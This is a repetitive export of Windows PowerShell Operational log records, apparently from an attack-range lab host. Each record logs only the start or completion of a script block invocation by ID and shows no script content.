SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469077
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469076
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469075
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469074
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469073
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469072
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469071
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469070
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469069
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469068
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469067
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469066
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469065
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469064
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469063
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469062
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469061
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469060
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469059
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469320
Keywords=None
Message=Completed invocation of ScriptBlock ID: 64663673-3388-407d-9a69-709aa0010c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469319
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469318
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469317
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469316
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469315
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469314
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469313
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469312
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469311
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469310
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469309
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469308
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469307
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469306
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469305
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469304
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469303
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469302
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469301
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469300
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469299
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469298
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469297
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469296
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469295
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469294
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469293
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469292
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469291
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469290
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469289
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469288
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469287
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469286
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469285
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469284
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
